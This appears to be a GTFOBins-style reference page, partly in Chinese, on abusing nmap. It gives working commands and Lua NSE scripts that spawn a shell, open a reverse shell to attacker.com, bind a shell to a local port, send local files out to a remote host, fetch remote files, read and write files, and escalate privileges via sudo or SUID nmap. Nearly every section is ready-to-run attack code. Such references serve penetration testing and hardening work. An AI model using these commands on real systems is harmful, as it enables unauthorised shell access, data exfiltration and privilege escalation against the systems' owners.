.. / nmap

shell

用来生成一个交互式的系统shell。

Input echo is disabled.
```
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
```
The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
```
nmap --interactive
nmap> !sh
```

non-interactive-reverse-shell

向监听端口发送一个非交互式反向shell。
在攻击者机器上运行nc -l -p 12345以接收shell。

Run nc -l -p 12345 on the attacker box to receive the shell.

export RHOST=attacker.com
export RPORT=12345
TF=$(mktemp)
echo 'local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
while true do
  local r,x=t:receive();local f=assert(io.popen(r,"r"));
  local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();' > $TF
nmap --script=$TF

non-interactive-bind-shell

将一个非交互式的shell监听到本地端口，以允许远程网络访问。
运行 nc target.com 12345 来连接到该shell。

Run nc target.com 12345 on the attacker box to connect to the shell.

export LPORT=12345
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
while true do
  local r,x=c:receive();local f=assert(io.popen(r,"r"));
  local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' > $TF
nmap --script=$TF

file-upload

上传文件到外部。

Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.

RHOST=attacker.com
RPORT=8080
LFILE=要发送的文件
nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE

Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file.

export RHOST=attacker.com
export RPORT=12345
export LFILE=要发送的文件
TF=$(mktemp)
echo 'local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();' > $TF
nmap --script=$TF

file-download

下载远程文件。

Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., php -S 0.0.0.0:8080. Note that multiple connections are made to the server and the result is placed in $TF/IP/PORT/PATH. Also, it is important that the port is a commonly used HTTP like 80 or 8080.

RHOST=attacker.com
RPORT=8080
TF=$(mktemp -d)
LFILE=file_to_save
nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE

Fetch a remote file via TCP. Run nc target.com 12345 < "要发送的文件" on the attacker box to send the file.

export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);' > $TF
nmap --script=$TF

file-write

将数据写入文件中。

TF=$(mktemp)
echo 'local f=io.open("要写入的文件", "wb"); f:write("data"); io.close(f);' > $TF
nmap --script=$TF

The payload appears inside the regular nmap output.

LFILE=要写入的文件
nmap -oG=$LFILE DATA

file-read

从文件中读取数据。

TF=$(mktemp)
echo 'local f=io.open("要读取的文件路径", "rb"); print(f:read("*a")); io.close(f);' > $TF
nmap --script=$TF

The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.

nmap -iL 要读取的文件路径

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

Input echo is disabled.
```
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
```
The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
```
sudo nmap --interactive
nmap> !sh
```

limited-suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

Input echo is disabled.

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
./nmap --script=$TF

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

The payload appears inside the regular nmap output.
```
LFILE=要写入的文件
./nmap -oG=$LFILE DATA
```